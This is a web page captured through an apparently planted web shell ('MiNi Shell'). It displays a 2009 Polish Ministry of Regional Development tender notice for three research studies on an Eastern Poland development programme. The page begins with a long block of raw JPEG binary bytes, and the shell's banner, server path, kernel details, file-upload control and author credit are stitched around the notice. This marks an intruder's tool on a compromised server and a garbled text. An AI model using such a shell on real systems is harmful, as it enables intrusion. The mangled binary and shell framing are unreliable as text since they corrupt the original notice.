JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090306/52410-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonanie trzech badań:
1.	badania świadomości i potrzeb komunikacyjnych wybranych grup docelowych działań informacyjno-promocyjnych prowadzonych w ramach Planu Komunikacji Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013,
2.	badania jakości konceptów reklamowych,
3.	badania ewaluacyjnego działań informacyjno-promocyjnych przeprowadzonych
w 2009 roku w ramach Planu komunikacji Programu Operacyjnego Rozwój Polski Wschodniej</b><br>
<b>Numer ogłoszenia: 52410 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Rozwoju Regionalnego , ul. Wspólna 2/4, 00-926 Warszawa, woj. mazowieckie, tel. 0-22 461 30 00, faks 0-22 461 33 62.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie trzech badań:
1.	badania świadomości i potrzeb komunikacyjnych wybranych grup docelowych działań informacyjno-promocyjnych prowadzonych w ramach Planu Komunikacji Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013,
2.	badania jakości konceptów reklamowych,
3.	badania ewaluacyjnego działań informacyjno-promocyjnych przeprowadzonych
w 2009 roku w ramach Planu komunikacji Programu Operacyjnego Rozwój Polski Wschodniej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie trzech badań:
-badania świadomości i potrzeb komunikacyjnych wybranych grup docelowych działań informacyjno-promocyjnych prowadzonych w ramach Planu Komunikacji Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013,
-	badania jakości konceptów reklamowych,
-	badania ewaluacyjne godziałań informacyjno-promocyjnych przeprowadzonych w 2009 roku w ramach Planu komunikacji Programu Operacyjnego Rozwój Polski Wschodniej.
Program Operacyjny Rozwój Polski Wschodniej 2007-2013 (PO RPW) jest jednym z instrumentów polityki regionalnej. Stanowi dodatkowy element wsparcia z funduszy strukturalnych, który wzmocni działanie innych programów operacyjnych na obszarze pięciu najsłabiej rozwiniętych regionów Polski - województw: warmińsko-mazurskiego, podlaskiego, lubelskiego, podkarpackiego i świętokrzyskiego.
Strategia Komunikacji Funduszy Europejskich nakłada na Instytucję Zarządzającą Programu Operacyjnego Rozwój Polski Wschodniej obowiązek prowadzenia systematycznej i obiektywnej oceny realizacji Planu Komunikacji PO RPW. Oprócz ewaluacji strategicznej, badającej oddziaływanie na poziomie Planu Komunikacji rekomendowane jest również prowadzenie doraźnych ewaluacji operacyjnych, badających oddziaływanie poszczególnych elementów Planu, np. etapów kampanii promocyjnej. 
Wyniki planowanego badania świadomości i potrzeb komunikacyjnych grup docelowych, jak również wyniki badania jakości konceptów reklamowychumożliwią sformułowanie wniosków i rekomendacji niezbędnych do przygotowania skutecznych, trwałych i użytecznych działań komunikacyjnych w ramach PO RPW. Wyniki badania ewaluacyjnego pomogą ocenić efekty podjętych działań oraz zaplanować kolejne działania w przyszłości.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6, 74.13.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie               art. 24 ustawy oraz spełniają warunki określone w art. 22 ust. 1 pkt 1, 2 i 3 ustawy;
2)	wykonali należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonują należycie, w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania lub w okresie prowadzenia działalności, jeśli okres ten jest krótszy niż trzy lata, usługi polegające na przeprowadzeniu:
a)	10 badań ilościowych o zasięgu ogólnopolskim, każde badanie na próbie minimum 1000 osobowej (badania cykliczne wykonywane na zlecenie jednego klienta są traktowane jako jedno badanie.),
b)	pięciu badań jakościowych o wartości co najmniej 30 tysięcy złotych brutto każde, 
c)	dwóch projektów badawczych polegających na pretestingu materiałów promocyjnych i reklamowych,
3)	dysponują lub będą dysponować zapleczem technicznym niezbędnym do realizacji przedmiotu zamówienia tj.:
a)	co najmniej 6 salami do zogniskowanych wywiadów grupowych (profesjonalna sala dostosowana do przeprowadzenia badań jakościowych, mieszcząca grupy liczące 8-12 uczestników oraz stanowiska dla reprezentantów zamawiającego. Stanowiska te znajdują się w osobnym pomieszczeniu, za lustrem weneckim, umożliwiające bezpośrednie przyglądanie się przebiegowi badania. Sala wyposażona jest w sprzęt audio-video umożliwiający nagrywanie oraz odtwarzanie VHS/DVD.), po jednej w: Warszawie, Olsztynie, Białymstoku, Lublinie, Kielcach, Rzeszowie,
b)	centrum (bądź centrami) badań telefonicznych (zaawansowane technologicznie, skomputeryzowane studio dysponujące co najmniej 10 stanowiskami ankieterskimi. Każde stanowisko składa się z osobnego komputera umożliwiającego połączenia telefoniczne. Komputery pracują w jednej sieci na platformie programu komputerowego, który integruje działania ankieterskie).
4)	wyznaczą do realizacji przedmiotu zamówienia:
a)	kierownika realizacji zamówienia odpowiedzialnego za koordynację wszystkich działań podejmowanych w związku z realizacją przedmiotu zamówienia, posiadającego:
-	minimum 5-letnie doświadczenie zawodowe w kierowaniu badaniami ilościowymi i jakościowymi opinii publicznej.
b)	kierownika badań ilościowych odpowiedzialnego za koordynację badań ilościowych realizowanych w ramach zamówienia, posiadającego:
-	minimum 2-letnie doświadczenie na stanowisku kierowniczym w zakresie realizacji badań ilościowych oraz w zakresie analiz statystycznych i interpretacji danych ilościowych.
c)	kierownika badań jakościowych odpowiedzialnego za koordynację badań jakościowych realizowanych w ramach zamówienia, posiadającego łącznie:
-	minimum 2-letnie doświadczenie na stanowisku kierowniczym w zakresie realizacji badań jakościowych oraz prowadzeniu analiz i interpretacji danych jakościowych,
-	doświadczenie jako moderatora prowadzącego badania metodą zogniskowanych wywiadów grupowych (min 25 FGI) i metodą indywidualnego wywiadu pogłębionego (min. 50 IDI),
- doświadczenie w badaniu jakościowym konceptów reklamowych (przeprowadzonych co najmniej 5 badań tego typu)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu, określonych w ust. 1 wykonawcy muszą złożyć wraz z ofertą następujące oświadczenia i dokumenty:
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ustawy - sporządzone zgodnie z wzorem stanowiącym Załącznik Nr 2 do SIWZ;
3)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, sporządzony zgodnie z Załącznikiem Nr 3 do SIWZ, usług polegających na przeprowadzeniu:
1.	10 badań ilościowych o zasięgu ogólnopolskim, każde badanie na próbie minimum 1000 osobowej (badania cykliczne wykonywane na zlecenie jednego klienta są traktowane jako jedno badanie.),
2.	pięciu badań jakościowych o wartości co najmniej 30 tysięcy złotych brutto każde, 
3.	dwóch projektów badawczych polegających na pretestingu materiałów promocyjnych i reklamowych,
Wykaz musi zawierać informacje niezbędne do stwierdzenia czy wykonawca spełnia warunek określony w ust. 1 pkt 2). Do każdej wykonanej usługi (wskazanej w wykazie) należy przedstawić dokument potwierdzający, że usługa ta została wykonana należycie; 
4)	wykaz narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca potwierdzający spełnianie warunku, o którym mowa w ust. 1 pkt 3) lit a) i b) lub pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w niniejszym punkcie, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował; 
5)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, sporządzony zgodnie z Załącznikiem Nr 4 do SIWZ. Wykaz musi zawierać informacje niezbędne do stwierdzenia czy wykonawca spełnia warunek określony w ust. 1 pkt 4). Dokumentując spełnianie warunku odnoszącego się do udziału w badaniach, o których mowa 
w § 3 ust. 1 pkt 4) lit. od a) do c) SIWZ, należy podać co najmniej tytuły badań, ich zakresy oraz nazwę podmiotu zlecającego lub odpowiedzialnego za realizacje przedmiotowego badania, a także daty ich wykonania (miesiąc i rok). Jeżeli w wykazie, o którym mowa w niniejszym punkcie wykonawca wskazał osoby, którymi będzie dysponował, zobowiązany jest przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 

3. W przypadku wnoszenia oferty przez wykonawców występujących wspólnie (konsorcja/ spółki cywilne) należy spełnić następujące warunki:
a)	wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
b)	do oferty należy dołączyć pełnomocnictwo (w formie pisemnej, tj. w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez notariusza lub mocodawcę), o którym mowa w lit a) oraz dokumenty, wymienione w ust. 2, z tym, że dokumenty o których mowa w ust. 2 pkt 1) i 2) należy dołączyć od każdego wykonawcy;
c)	oferta oraz dokumenty potwierdzające spełnianie warunków udziału w postępowaniu muszą być podpisane zgodnie z zasadami określonymi w § 4 ust. 4 przez każdego wykonawcę lub ustanowionego pełnomocnika.
4.	W przypadku wnoszenia oferty przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wymagane dokumenty należy złożyć na zasadach określonych w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 ze zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Metodologia realizacji zamówienia - 20</li>
<li>3 - Propozycje działań eliminujących wady poszczególnych metod i technik badawczych - 10</li>
<li>4 - Propozycja zestawu wskaźników - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mrr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 11:00, miejsce: Kancelaria Ogólna Ministerstwa Rozwoju Regionalnego  - pok. 0001, ul. Wspólna 2/4, 00 - 926 Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com